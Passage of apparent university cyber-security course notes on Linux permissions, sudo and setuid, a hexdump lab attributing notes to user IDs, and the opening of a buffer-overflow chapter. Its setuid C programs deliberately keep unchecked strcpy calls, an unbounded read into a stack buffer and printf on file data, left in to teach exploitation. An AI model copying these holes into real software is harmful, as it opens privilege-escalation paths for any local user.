This file named notes will reside in the /tmp directory.

    #include<stdio.h>
    #include<stdlib.h>
    #include<string.h>
    #include<fcntl.h>
    #include<sys/stat.h>
    #include<unistd.h>

    int main( int argc , char *argv[ ] )
    {
        int fd ;
        char *buffer ;

        buffer = (char *)malloc(100);

        strcpy( buffer , argv[ 1 ] );

        strncat( buffer , "\n" , 1 );

        fd = open("/tmp/notes", O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );

        if ( fd == -1 )
        {
            printf( "\nFailed to open.\n");
        }

        write( fd , buffer , strnlen( buffer , 100 ) );

        free( buffer );

        close( fd );
    }

When we compile a program, the executable object code file is named a.out. We can change the name of the object code to a name of our choosing by using the -o specifier. In the screen capture below, I named the executable code as note1.exe.

Let’s look at the read, write and execute permissions for the source code (note1.c), the object code (note1.exe) and the text file that this program creates and writes to (/tmp/notes):

It would seem that the executable program that we wrote (note1.exe) can be executed by anyone, but the file /tmp/notes can only be read and written to by the user named midshipman (since the file is owned by user midshipman).

How many users have accounts on our system? How can we find out? Recall that in Linux, every user is given a directory under the home directory. So, let's see who has folders under the home directory.

There is one user that is not shown on this list: the user named root. Of all accounts on a Linux system, the account named root has special privileges and full access rights over the entire system. The root account is owned by the system administrator, and has the ability to read, write and execute all files in anyone’s account. Each user who has an account on a Linux system has a unique user ID number, which you can determine by using the id command.
For example, to determine the unique ID number for joe, we enter

    id joe

If we do this for all users we determine the following IDs:

    root          0
    mia           500
    joe           501
    instructor    998
    midshipman    999

There is a command that allows us to switch users… to switch from midshipman to, say, joe. This command is the su command. Let’s try it!

This command failed! The su command asks for the password of the target account (in this case, joe’s password). The only time a password will not be asked for is if the su command is entered by the root user! Hopefully you will agree that it makes sense to restrict this command to run without a password only for the system administrator! If we wanted to switch to the root user, we would type just su, but, again, this will ask for the root user’s password.

Since executing commands as the root user is potentially very dangerous, Linux provides a more restricted version of the su command, called sudo. Using sudo allows us to execute a single command as the root user. After using sudo, the very next command will revert you back to the privileges of your account.[14] Since using sudo gives you root privileges (even for only a single command), a user is prompted for a password every time they use sudo. This should make sense, since if anyone could use the sudo command, then anyone can act as the root user, one command at a time. In a Linux system, the system administrator (root) may give a few trusted assistants sudo privileges.

In order for you to explore privilege management, and get a fuller understanding of how permissions are managed behind the scenes, your textbook author (Jon Erickson) has set up your VMware software so that you, the user midshipman, can use the sudo command without a password. This will allow you to switch your identity to that of other users in order to see the system from their perspective. You must always keep in mind that this is not something that an ordinary user would ever be able to do.
(http://xkcd.com)

So… let’s use sudo to become the user joe! We enter:

    sudo su joe

and see, I’m joe![15]

3.2. The setuid Permission

As joe, can I execute the program note1.exe? Looking at the permissions for this file from Section 3.1 above, the answer would seem to be "yes". Let's try to execute note1.exe:

The program did not work. Looking back at the program at the start of Section 3.1, it looks like we invoked the if statement:

    if ( fd == -1 )
    {
        printf( "\nFailed to open.\n");
    }

Although joe has permission to execute the program note1.exe, joe is not permitted to write to the file notes. Suppose we want joe to be able to execute the program note1.exe and actually make changes to the file named /tmp/notes, but we still do not want him to be able to read or write directly to the file /tmp/notes. In other words, we do not want joe to be able to write to the file by using, say, nano or some other program, but we do want him to be able to write to the file provided he only does this by using the note1.exe program. You may be surprised to know that this sort of scenario occurs quite frequently!

Linux handles this by providing a special permission called the set user ID (setuid) permission. If an executable program has the setuid flag set, then whenever the program is executed, it will behave as though it were being executed by the owner.

[14] The meaning of the acronym sudo is unclear. In some texts it is presented as "switch user (to root and) do". In some texts it is presented as "super user do". In some texts it is presented as "substitute user (for root and) do". Of course all texts are in agreement about what the sudo command actually does!
[15] Although sudo only provides me the ability to execute one command as root, if the command is to switch to another user, you will remain as that user. In other words, you do not revert back to the former user after one command.
In other words, if we set the setuid flag for the file note1.exe, then when joe executes the program, the program will run as if the owner (midshipman) were executing it. This is good because the user named midshipman is the only one who can write to the file /tmp/notes.

The owner, midshipman, can set the setuid flag for note1.exe (so can root). Let's switch back to the user named midshipman by typing exit, and then:

chmod u+s note1.exe

Let's do this and look at a listing of the file permissions:

Note the s in the execute field for the owner. That is the indicator that the setuid flag is set. (If the listing showed a capital S instead, the setuid bit would be set but the owner's execute bit would not be, and the file could not be run as the owner at all.)

So... let's go back to being joe and let's see if joe can now add notes to /tmp/notes. We enter:

sudo su joe

and then run note1.exe.

Note that joe cannot directly read the file notes (see the permissions for /tmp/notes given in Section 3.1 above). The only way joe can have an effect on the file /tmp/notes is through the use of the program note1.exe. If we exit, and look at the file as midshipman:

It worked! Now joe, or anyone, can use the program (but only midshipman can read the file /tmp/notes). Keep in mind what this means: every bug in note1.exe is now reachable by any user on the system, and it is exercised with midshipman's privileges. A setuid program must therefore be written and checked far more carefully than an ordinary one.

Practice Problem 9.8
You are viewing the access privileges of a file exam1.sh and they read:

-r-xr-xr--

(a) What privileges for this file are granted to the owner?
(b) You give the command chmod g-x exam1.sh. What access privilege(s) did you change and to whom do they apply?

Solution:
(a)
(b)

Practice Problem 9.9
The following is the output of ls -l for the shutdown command, which is a system administration program. We can see that it is owned by the root user (administrator) and appears to be executable by everyone. That is, in actuality, not the case, since the program named shutdown actually calls other programs, and these other programs can only be executed by the root user. How can the root user modify the permissions to this program to allow anyone to shut down the computer? (Give the command, then an explanation of how it solves this problem.)
Solution:

Practice Problem 9.10
What does the sudo command accomplish?

Solution:

Practice Problem 9.11
Who can execute the sudo command?

Solution:

Practice Problem 9.12
Consider the long listing for three files, shown below. The file note1.c is a C program that writes to the file /tmp/notes. The file note1.exe is the compiled version of note1.c. The system has four users: midshipman, smith, jones and, of course, root.

(a) The user smith executes the file note1.exe and notices that his attempts to write to the file /tmp/notes are not successful. Explain why.

Solution:

(b) Suppose it was necessary to grant users the ability to write to the file /tmp/notes, but only when executing the program note1.exe. Your friend proposes two ways of accomplishing this:
(i) Enter the command: chmod u+w /tmp/notes
OR
(ii) Enter the command: chmod u+s note1.exe
Which option do you select and why?

Solution:

APPENDIX: More about the open command[16]

Let's go back to that cryptic line of code:

fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );

and talk about the second argument to the open function. This second argument reads:

O_RDWR|O_CREAT|O_APPEND

These flags are passed to the operating system by the open system call; the compiler does nothing with them beyond combining the bits. The first item, O_RDWR, tells open that the program intends to both read and write the file stuff. We have two other choices for this first flag:

If we only want the program to read a file (but never write to it): O_RDONLY
If we only want a program to write to a file (but never read it): O_WRONLY

Exactly one of O_RDONLY, O_WRONLY and O_RDWR must be present; the remaining flags are optional and are combined with the vertical bar.

The second flag, O_CREAT, tells open to create the file if it does not already exist.

The third flag, O_APPEND, tells open to write data by appending it to the end of the file.

Footnote 16: Okay, let's end this chapter on an upbeat note: THIS APPENDIX IS NOT TESTABLE!
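Before turning to the third argument, here is the open call from the appendix in working form. The following C code is an added example for these notes, not code from the EC310 text: it appends to a file with O_WRONLY|O_CREAT|O_APPEND, creates a file with a requested set of permission bits and reports the bits the file actually received, and computes what the process umask will leave of a requested mode. The file names under /tmp are hypothetical, and the two extra flags used, O_EXCL (fail if the file already exists) and O_NOFOLLOW (fail if the path is a symbolic link), are not in the appendix's line but are standard open flags.

```c
#define _DEFAULT_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Added example for the EC310 notes, not part of the original text.
 * All file names used below are hypothetical. */

/* Remove `path` if it exists. Returns 1 when no file of that name remains. */
int start_fresh(const char *path)
{
    unlink(path);
    return access(path, F_OK) != 0;
}

/* Append `text` to `path`, creating the file with owner read/write only
 * (S_IRUSR|S_IWUSR, i.e. 0600) if it does not exist. O_APPEND makes every
 * write land at the current end of the file; O_NOFOLLOW makes open fail
 * instead of silently following a symbolic link placed at `path`, which is
 * the sensible default for a file kept in a shared directory such as /tmp.
 * Returns the number of bytes written, or -1 on error. */
long append_note(const char *path, const char *text)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW,
                  S_IRUSR | S_IWUSR);
    ssize_t n;

    if (fd == -1)
        return -1;
    n = write(fd, text, strlen(text));
    close(fd);
    return (long)n;
}

/* Create `path` with the requested permission bits and return the bits the
 * file actually received (or -1). Any existing file is removed first: the
 * third argument of open is consulted only when O_CREAT creates a new file,
 * never to change the permissions of one that already exists. O_EXCL makes
 * open fail if a file appeared in the meantime, rather than opening it. */
long create_with_mode(const char *path, mode_t requested)
{
    struct stat st;
    int fd;

    unlink(path);
    fd = open(path, O_RDWR | O_CREAT | O_EXCL, requested);
    if (fd == -1)
        return -1;
    if (fstat(fd, &st) == -1) {
        close(fd);
        return -1;
    }
    close(fd);
    return (long)(st.st_mode & 07777);
}

/* The bits a new file will get: the requested bits minus the process umask.
 * umask() can only be read by setting it, so the old value is put back. */
long expected_mode(mode_t requested)
{
    mode_t old = umask(0);
    umask(old);
    return (long)(requested & ~old & 07777);
}

/* Size of `path` in bytes, or -1 if it cannot be stat'ed. */
long file_size(const char *path)
{
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1L;
}

int main(void)
{
    const char *path = "/tmp/ec310_stuff";   /* hypothetical file name */

    start_fresh(path);
    printf("appended %ld bytes\n", append_note(path, "first line\n"));
    printf("appended %ld bytes\n", append_note(path, "second line\n"));
    printf("file is now %ld bytes\n", file_size(path));
    printf("requested 0666, created with 0%lo (umask applied; expected 0%lo)\n",
           create_with_mode("/tmp/ec310_stuff2", 0666), expected_mode(0666));
    return 0;
}
```

Running it and then typing ls -l /tmp/ec310_stuff shows -rw------- regardless of umask, because 0600 has no bits for the umask to remove; the second file shows the umask at work.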
Our cryptic line of code should now make sense except for that last (third) argument:

fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );

The third argument is used to set the file permissions when open creates the file (it is ignored if the file already exists). The choices to place in the third argument are:

    S_IRUSR   The owner has permission to read the file
    S_IWUSR   The owner has permission to write to the file
    S_IXUSR   The owner has permission to execute the file
    S_IRGRP   The owner's group has permission to read the file
    S_IWGRP   The owner's group has permission to write to the file
    S_IXGRP   The owner's group has permission to execute the file
    S_IROTH   Anyone has permission to read the file
    S_IWOTH   Anyone has permission to write to the file
    S_IXOTH   Anyone has permission to execute the file

I could put as many of these choices in the third argument as I choose, separating my choices with a vertical bar. (One caveat: the bits requested here are further filtered by the process's umask, so a new file may end up with fewer permissions than requested, never more.) What should be the result if I now entered:

ls -l stuff

Problems

1. Navigate to the instructor directory. You should see the prompt shown. Using nano, open the file unix_basics for editing:

midshipman@EC310:/home/instructor $ nano unix_basics

Add your favorite Linux command (we realize you have several; just pick one) to the top of the file, and save the file under the same name (Control-o). Were you successful? Why/Why not?

2. Given the following declaration

char school[20] = "US Naval Academy";

what value would be returned by each of the following function calls:
(a) strlen(school);
(b) strlen("school");

3. Concerning the C programming language:
(a) What feature of C makes a buffer overflow possible? Be specific!
(b) Who (or what) is responsible for data integrity and memory management in C? (I.e., is it the responsibility of the compiler?)

4. Recall Problem 2 at the end of Chapter 6.
The problem asked you to enter and compile the program below:

void test_function( int a, int b, int c, int d, int e)
{
    int flag;
    char buffer[ 10 ];

    flag = 1234;
    buffer[ 0 ] = 'U';
    buffer[ 1 ] = 'S';
    buffer[ 2 ] = 'A';
}

int main( )
{
    test_function( 5, 6, 7, 8 , 9 );
}

The Chapter 6 problem then asked you to analyze memory to determine where various arguments and variables were stored in memory. In this exercise we will repeat the problem, but by using just the assembly language. Additionally, you do not need to enter or recompile the program! You should answer all questions by only using the screen captures provided below.

Consider the screen capture below, which was taken after pausing the program just before the function call (i.e., while still in main's stack frame):

(a) Sketch a picture of the stack frame for main. In your diagram, show where the base pointer and stack pointer are pointing to (label these as EBP-main and ESP-main), and show where the arguments to test_function are stored in memory.

I now continue running the program and pause just before the closing brace for the function named test_function (so I am in test_function's stack frame). Consider the screen shot shown below.

(b) Based on the screen capture, add to your sketch by showing:
    the stack frame for test_function (label the base pointer and stack pointer as EBP-test_function and ESP-test_function);
    the location of flag (Hint: the base-10 value 1234 is equivalent to 0x4d2);
    the location of buffer.

(c) Show, on your diagram, where the return address and the saved value of the base pointer are stored. From the assembly code snapshots given, determine the value of the stored return address and the value of the saved base pointer, and annotate these on your figure.

5. After typing in the command

ls -l gethappy.exe

you see:

(a) Who is the owner of this file?
(b) What permissions do other users in the owner's group have?
(c) You (midshipman) are neither the owner nor part of the owner's group instructor.
What command would the administrator enter to give you permission to read and execute the gethappy.exe file?

6. Continuing Problem 5 above: You (midshipman) now have permission to read and execute the gethappy.exe file. The function of the gethappy.exe file when executed is to write to the file happytimes. After multiple attempts, the executable file is not operating as expected. The owner changes the executable file. You see:

(a) What permission changed? Your answer must include the name of the permission.
(b) How does the change to the file's permissions affect the execution of the file?

Security Exercise 9
Do you know who I am! Bonus points to the midshipman that can guess this target!

Part I. Initial Set-up

The program you will use today is named note2.c and this program has already been placed on your machine in the ec310code folder under your home directory. Copy this file to the work directory by carefully entering the following at the home directory prompt (make sure you are at your home directory!):

midshipman@EC310:~ $ cp ec310code/note2.c work

Verify that you have note2.c in your work directory by changing to the work directory:

cd work

and then listing the files in the work directory:

ls

If you do not have note2.c in your work directory STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part II.

Part II. A Truly Useful Program

Before looking at the code, let's discuss the motivation for this program. Here is the scenario: You are the Company Commander for your Company. The intent of the program is to allow anyone in your Company (who, of course, all have Linux accounts) to send you a note. All the notes that are sent to you by company-mates will be written into the file /tmp/notes, one after another. The idea is that you can read all the notes that midshipmen in your Company send you, but the midshipmen cannot read the notes sent by anyone else (in fact, they can't even read their own notes once submitted).
To make this more concrete, you might, at the start of the day, write a note (to yourself) that says

Notes received today:

Then, later in the morning, you might get a note from instructor that says:

Nice job applying your Cyber2 skills in the Hall – keep it up.

Then, in the afternoon, your friend mia might send you a note that says:

The wardroom fridge might be on the fritz again.

In the evening, then, you could check the file named /tmp/notes and see all the notes that were left for you during the day. For this example, you would enter

cat /tmp/notes

and see:

Notes received today:
Nice job applying your Cyber2 skills in the Hall – keep it up.
The wardroom fridge might be on the fritz again.

But your program is even better than this! Your program includes the user ID of everyone who adds a note! Recall that the user IDs for the users on your system are:

    User          ID
    root            0
    mia           500
    joe           501
    instructor    998
    midshipman    999

All right! Time to look at the code! (Line 6, #include<unistd.h>, declares getuid, write and close; the remaining line numbers are the ones referred to in the explanation below.)

1.  #include<stdio.h>
2.  #include<stdlib.h>
3.  #include<string.h>
4.  #include<fcntl.h>
5.  #include<sys/stat.h>
6.  #include<unistd.h>
7.  int main( int argc , char *argv[ ] )
8.  {
9.      int fd ;
10.
11.     int userid;
12.
13.     char *buffer ;
14.
15.     buffer = (char *)malloc(100);
16.
17.     strcpy( buffer , argv[ 1 ] );
18.
19.     strncat( buffer , "\n" , 1 );
20.
21.     fd = open( "/tmp/notes" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
22.
23.     userid = getuid( ) ;
24.
25.     write( fd , &userid , 4 );
26.
27.     write( fd , "\n" , 1 );
28.
29.     write( fd , buffer , strlen( buffer ) );
30.
31.     free( buffer );
32.
33.     close( fd );
34. }

In the explanation that follows, let's presume that the executable file is named ./note2.exe (instead of ./a.out) and let's presume that the user named mia runs the program by entering

./note2.exe "What is for evening meal?"

Notice that argv[1] is the string: "What is for evening meal?"

Line 9 declares an integer named fd that will later hold the file descriptor for the file /tmp/notes.
Line 11 declares an integer named userid that will later hold the user ID for the user entering a particular note.

Lines 13 and 15 allocate space for 100 bytes on the heap, enough to hold a string of up to 99 characters plus its terminating NULL. The name of the string is buffer (so buffer points to the first character in the string).

Line 17 copies argv[1] to buffer, so, in our example, buffer will now hold the string "What is for evening meal?" (followed by the NULL). Nothing on line 17 checks that argv[1] actually fits in the 100 bytes allocated on line 15.

Line 19 appends a newline character to buffer (and this occurs before the NULL), so, after line 19, buffer contains the string "What is for evening meal?\n" followed by the NULL.

Line 21 assigns a file descriptor to the file named "/tmp/notes" and places the file descriptor in the integer variable named fd that was declared on line 9. From this point onward, whenever we wish to refer to the file "/tmp/notes" we will use the file descriptor fd.

Line 23 contains a function we have not seen before: the function getuid( ). This function returns the real user ID of the process, that is, the ID of the user who ran the program (even if the program is setuid and is running with someone else's permissions). Recall that in our example, the user mia is running the program, so getuid( ) will return the value 500, which is mia's ID. So, line 23:

userid = getuid( ) ;

will assign the value 500 to the integer variable userid which was declared on line 11.

Up to this point in the program, information has been placed on the heap (in the string named buffer), but nothing yet has been written to the file /tmp/notes. Line 25 performs the first operation to write to the file, and notice that what is written is the user's ID, as the 4 raw bytes of the integer userid rather than as the characters 5, 0, 0, followed by (on line 27) a new line character. Then, on line 29, we write the contents of buffer to the file. So, at this point, the file /tmp/notes contains:

500
What is for evening meal?

Finally, line 31 frees space on the heap and line 33 closes the file.

Now, suppose an hour later, user instructor (whose ID is 998) runs the program by entering:

./note2.exe "When is the next parade?"
After instructor is done running the program, the file "/tmp/notes" contains:

500
What is for evening meal?
998
When is the next parade?

So when you, the Company Commander, review the file at the end of the day, you can see all the notes left for you and, just as important, who it is that left each of the notes.

Part III. Practice Running the Program

Let's compile the program, saving the machine language file under the name note2.exe, by entering:

gcc -g -o note2.exe note2.c

Then add the first line to the file /tmp/notes by entering:

./note2.exe "Notes received today:"

Examine the file /tmp/notes by entering:

cat /tmp/notes

Notice that your ID number is garbled! That is because the 4 bytes of the integer 999 (your ID number) were written to the file as they sit in memory, and cat displays them as characters. We'll address this later.

Now, check permissions for note2.exe and /tmp/notes by entering:

ls -l note2.exe /tmp/notes

You should see:

Question 1: Who owns the file note2.exe?

Question 2: List all of the users who are able to write to the file named /tmp/notes.

You tell all of your company-mates that they have execute permission for the file note2.exe, and that they are to start sending you messages during the day, and you will review their messages and reply each evening. The first evening arrives, you look at the file /tmp/notes and you see only your message (Notes received today:). Your company-mates mia and joe insist that they sent you messages during the day. Hmm... it seems that messages left by other individuals are not being saved, even though everyone has permission to execute the program note2.exe.

Question 3: Why are other users not experiencing success with this program?

Question 4: What command should you enter to remedy the problem you noted in Question 3? (Do it!) (Hint: if you answered Question 4 correctly, then, upon entering ls -l note2.exe you should see the listing shown.)

Now, let's see how the program would look from mia's perspective.
First, switch to user mia by entering

sudo su mia

Now, the prompt should indicate that you are the user named mia. Cool - You're mia!!!

Now, noticing that you are mia, run the program by entering:

./note2.exe "A message from Mia."

Now, as mia, examine the file /tmp/notes by typing:

cat /tmp/notes

Question 5: Was mia successful in looking at the file /tmp/notes? Why/Why not?

Switch back to being the user named midshipman by entering

exit

Now, examine the file /tmp/notes by typing:

cat /tmp/notes

Question 6: Was the message from mia saved in the file?

Question 7: Is the following statement true or false: Only the user named midshipman can freely read from or write to the file named /tmp/notes. Other users are permitted to write to the file, but only in a very restricted sense: via the use of the program note2.exe.

Enter the command

ls -l /tmp/notes

Your friend sees the result and says: I see that only the file's owner, midshipman, is able to read or write to the file. But we just saw that mia was able to write to the file. How is that possible?

Question 8: How would you answer your friend's question?

Part IV. Autopsy of the File Named /tmp/notes

First, let's delete the current file named /tmp/notes so that we can start fresh.

rm /tmp/notes

Recall that rm stands for "remove." Verify that the file has been removed by typing:

cat /tmp/notes

You should see the message:

No such file or directory

From your work directory, carefully enter the following at the command prompt:

cp ../ec310code/notes /tmp

Now, recall that you are the user midshipman. Not just any midshipman. The Company Commander! You are very proud of having reached this position. Your people love you. You check the messages left by your company-mates by typing

cat /tmp/notes

and you see:

ARGGHH! You want to have a talk with the midshipman who sent you the next-to-last note. Was it your friend Mia? Or, perhaps it was Joe? We need to find out who it is!
That midshipman needs to be counseled on respectful communication and constructive feedback! Haven't we learned anything in this leadership laboratory?!

In Part III above we mentioned that the ID numbers are garbled. But we can look at the file in hexadecimal. Enter:

hexdump -C /tmp/notes

You should see this:

Examining the hexdump of the file /tmp/notes, our goal is to determine who left the note "You suck – worst CC EVER." For convenience, consult an ASCII table (hexdump -C also shows the printable characters of each 16-byte row in its right-hand column).

Let's go to the top of the hex dump. We know that the first text we have is:

Notes received today:

Let's focus just on the capital N and small o (i.e., the first two letters of Notes received today).

Question 9: Determine how the text No would be stored in memory in hexadecimal notation. Locate these values (from Question 9) in the hex code display.

Question 10: According to the ASCII table, what is the meaning of the byte that immediately precedes No in the hexdump?

Question 11: The first four bytes in the hex dump are e7 03 00 00. Since, for every note that is entered, the user ID number of the note writer, a new line, and the actual note are written to the /tmp/notes file, what is the significance of these first four bytes?

Question 12: Since the first four bytes are stored in little-endian order, rewrite these four bytes in their actual order.

Question 13: Convert your answer to Question 12 to a decimal integer.

Question 14: What is the significance of this value? (Hint: look at the top of the first page of this Security Exercise.)

Question 15: Use all your sleuthing abilities to find the hexadecimal value associated with the unpleasant person who left the note "You suck – worst CC EVER." What is the hex value of the user ID number of the person who left this note?

Question 16: Convert your answer for Question 15 to a decimal value.

Question 17: Who gets fried?
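The sleuthing in Questions 9 through 17 follows directly from the layout note2.c writes: four raw bytes of user ID in little-endian order, a newline, the note text, and the newline note2.c appended. The following C code is an added example for these notes, not part of the lab: a bounds-checked reader for that layout, which decodes the little-endian ID the way Questions 12 and 13 ask you to do by hand and then attributes each note to its author. The sample bytes are constructed here (two notes, from user IDs 500 and 998, matching the example in Part II) and are not the contents of the lab's notes file; the function names are the example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example for the EC310 notes, not part of the original exercise:
 * a bounds-checked reader for the /tmp/notes format that note2.c produces.
 * Each record is: 4-byte user ID (an int written with write(fd,&userid,4),
 * so little-endian on x86), a '\n', the note text, and the '\n' that note2.c
 * appended to the note. */

#define MAX_NOTE 100

struct note_record {
    uint32_t uid;
    char text[MAX_NOTE];
};

/* Reassemble four little-endian bytes: e7 03 00 00 -> 0x000003e7 -> 999. */
uint32_t le32_decode(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Parse `len` bytes of notes-file data into out[0..max-1]. Returns the number
 * of records parsed, or -1 if the data is malformed (a record header shorter
 * than 5 bytes, no '\n' after the user ID, or a note that never ends in '\n').
 * A note longer than MAX_NOTE-1 bytes is truncated rather than allowed to
 * run past the end of the text array. */
int parse_notes(const unsigned char *data, size_t len,
                struct note_record *out, int max)
{
    size_t pos = 0;
    int count = 0;

    while (pos < len) {
        size_t start, n;

        if (len - pos < 5 || data[pos + 4] != '\n')
            return -1;
        if (count == max)
            return count;           /* caller's array is full */
        out[count].uid = le32_decode(data + pos);
        pos += 5;

        start = pos;
        while (pos < len && data[pos] != '\n')
            pos++;
        if (pos == len)
            return -1;              /* truncated note */
        n = pos - start;
        if (n > MAX_NOTE - 1)
            n = MAX_NOTE - 1;
        memcpy(out[count].text, data + start, n);
        out[count].text[n] = '\0';
        pos++;                      /* step over the note's newline */
        count++;
    }
    return count;
}

/* Constructed sample: what /tmp/notes holds after mia (uid 500 = 0x1f4)
 * and instructor (uid 998 = 0x3e6) have each run note2.exe once. */
static const unsigned char sample[] =
    "\xf4\x01\x00\x00\nWhat is for evening meal?\n"
    "\xe6\x03\x00\x00\nWhen is the next parade?\n";
static const size_t sample_len = sizeof(sample) - 1;  /* drop the literal's NUL */

int sample_count(void)
{
    struct note_record r[8];
    return parse_notes(sample, sample_len, r, 8);
}

long sample_uid(int i)
{
    struct note_record r[8];
    int n = parse_notes(sample, sample_len, r, 8);
    return (i >= 0 && i < n) ? (long)r[i].uid : -1L;
}

int sample_text_is(int i, const char *expected)
{
    struct note_record r[8];
    int n = parse_notes(sample, sample_len, r, 8);
    return i >= 0 && i < n && strcmp(r[i].text, expected) == 0;
}

/* Who wrote the first note containing `needle`? -1 if nobody did. This is
 * the sleuthing of Questions 15-17 done by program instead of by hand. */
long author_of(const char *needle)
{
    struct note_record r[8];
    int n = parse_notes(sample, sample_len, r, 8);
    int i;
    for (i = 0; i < n; i++)
        if (strstr(r[i].text, needle) != NULL)
            return (long)r[i].uid;
    return -1L;
}

/* The first 12 bytes are a uid, its newline and part of a note with no
 * terminating newline; the parser must reject them, just as find_user_note
 * in Chapter 10 returns -1 when a read comes up short. */
int truncated_is_rejected(void)
{
    struct note_record r[8];
    return parse_notes(sample, 12, r, 8) == -1;
}

int main(void)
{
    struct note_record r[8];
    int n = parse_notes(sample, sample_len, r, 8);
    int i;
    for (i = 0; i < n; i++)
        printf("uid %u: %s\n", (unsigned)r[i].uid, r[i].text);
    printf("e7 03 00 00 decodes to %u\n",
           (unsigned)le32_decode((const unsigned char *)"\xe7\x03\x00\x00"));
    return 0;
}
```

To run it against a real file, read /tmp/notes into a byte array and hand that to parse_notes; the hexdump in the exercise and this parser are two views of the same bytes.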
Security Exercise 9 Answer Sheet

Name:

Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
Question 13:
Question 14:
Question 15:
Question 16:
Question 17:

Chapter 10: A Real Buffer Overflow

Objectives:
(a) Describe how a buffer overflow attack can be used to gain root access to a computer.
(b) Describe two techniques that a hacker can use to make it simpler to craft a buffer overflow.
(c) Describe technical solutions that have been proposed to prevent a program from being exploited by a buffer overflow.

1. Note-Taking and Note-Searching Programs

1.1. Review of Security Exercise 9

Last time in lab you looked at a fascinating program (named note2.c) that takes a scintillating text string as a command line argument, and then appends the scintillating text string to the end of the fabulous file with pathname /tmp/notes. The program also writes, immediately in front of each note, the user ID of whoever added it. You use this program in your capacity as Company Commander: anyone in your Company can send you a note. The idea is that you can read all the notes that midshipmen in your Company send you, but the midshipmen cannot read the notes sent by anyone else (and can't even read their own notes once submitted). By examining the user ID, you can identify all the "anonymous" (ha, ha) note senders. The program is repeated below.
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<fcntl.h>
#include<sys/stat.h>
#include<unistd.h>

int main( int argc , char *argv[ ] )
{
    int fd ;
    int userid ;
    char *buffer ;

    buffer = (char *)malloc(100);
    strcpy( buffer , argv[ 1 ] );
    strncat( buffer , "\n" , 1 );
    fd = open( "/tmp/notes", O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
    userid = getuid( ) ;
    write( fd , &userid , 4 );
    write( fd , "\n" , 1 );
    write( fd , buffer , strlen( buffer ) );
    free( buffer );
    close( fd );
}

Recall that when you first wrote this program, your company mates could not start immediately sending you notes. You first had to grant setuid permission by entering:

chmod u+s note2.exe

After that, anyone could run the program, and the program would then execute as though executed by the owner.

The file /tmp/notes that you looked at in the last lab was built as follows:

First you (midshipman) entered: Notes received today:
Then instructor entered: The wardroom fridge might be on the fritz again.
Then matrix entered: Thanks for the notes.
Then joe entered: You suck – worst CC EVER.
Then matrix entered: Great spirit spot-BZ.

And you saw all that you had made, and it was very good. And there was evening, and there was morning: the ninth EC310 chapter.

1.2. A New Program

The program note2.c is actually practical and useful. But it would be nice for a user to be able to explore the file /tmp/notes to see the notes that they had entered. Of course they should not be able to view the notes that were written by anyone else. For example, given the notes entered as shown above, if joe were to execute this hypothetical program, he would see only his own note, and if matrix runs the program she would see only her two notes.

Moreover, it would be nice if the program had one additional feature. It would be nice if the user could run the program with the option of specifying an additional command line argument. This command line argument would be a string, and the improved program would only return the user's comments containing that string.
The following screen capture should illustrate how we would like the improved program to run.

Presented below is a program, which we will name bettersearchnote.c, that does precisely this. This program is, quite obviously, the longest program you have seen (or will see!) in EC310. This program is powerful and complex. Our goal is that you understand the program in general terms. We present the program all at once below, but in the following pages we will describe the operation of each of its functions one-by-one. So... hang on!

#include<stdio.h>
#include<string.h>
#include<fcntl.h>
#include<sys/stat.h>
#include<unistd.h>

/* print_notes calls search_note before search_note is defined, so it is
   declared here first. */
int search_note( char *note , char *keyword );

int find_user_note( int fd , int user_uid )
{
    int note_uid = -1 ;
    unsigned char byte ;
    int length;

    while( note_uid != user_uid )
    {
        if( read( fd , &note_uid , 4 ) != 4 )
            return -1 ;
        if( read( fd , &byte , 1 ) != 1 )
            return -1 ;
        byte = 0;
        length = 0;
        while( byte != '\n' )
        {
            if( read( fd , &byte , 1 ) != 1 )
                return -1;
            length = length + 1 ;
        }
    }
    lseek( fd , length * -1 , SEEK_CUR );
    return length ;
}

int print_notes( int fd , int uid , char * searchstring )
{
    int note_length ;
    char byte = 0 ;
    char note_buffer[ 100 ] ;

    note_length = find_user_note( fd , uid );
    if( note_length == -1 )
        return 0;
    read( fd , note_buffer , note_length ) ;
    note_buffer[ note_length ] = 0 ;
    if( search_note( note_buffer , searchstring ) )
        printf( note_buffer );
    return 1;
}

int search_note( char *note , char *keyword )
{
    int i;
    int keyword_length ;
    int match = 0;

    keyword_length = strlen( keyword );
    if( keyword_length == 0 )
        return 1;
    for( i = 0 ; i < strlen( note ) ; i = i + 1 )
    {
        if( note[i] == keyword[ match ] )
            match = match + 1 ;
        else
        {
            if( note[ i ] == keyword[ 0 ] )
                match = 1 ;
            else
                match = 0 ;
        }
        if ( match == keyword_length )
            return 1;
    }
    return 0;
}

int main( int argc , char *argv[ ] )
{
    int user_id;
    int fd;
    int printing = 1;
    char searchstring[ 100 ] ;

    if( argc > 1 )
        strcpy( searchstring , argv[ 1 ] ) ;   /* This innocent looking line of code is a potential buffer overflow! Do you see why? */
    else
        searchstring[ 0 ] = 0 ;
    user_id = getuid( );
    fd = open( "/tmp/notes" , O_RDONLY );
    while( printing )
        printing = print_notes( fd , user_id , searchstring );
    close( fd );
}

So, notice that we have four functions: find_user_note, print_notes, search_note and main. We'll start (as all programs start) with the main function.

The main function

1.  int main( int argc , char *argv[ ] )
2.  {
3.      int user_id;
4.      int fd;
5.      int printing = 1;
6.      char searchstring[ 100 ] ;
7.      if( argc > 1 )
8.          strcpy( searchstring , argv[ 1 ] ) ;
9.      else
10.         searchstring[ 0 ] = 0 ;
11.     user_id = getuid( );
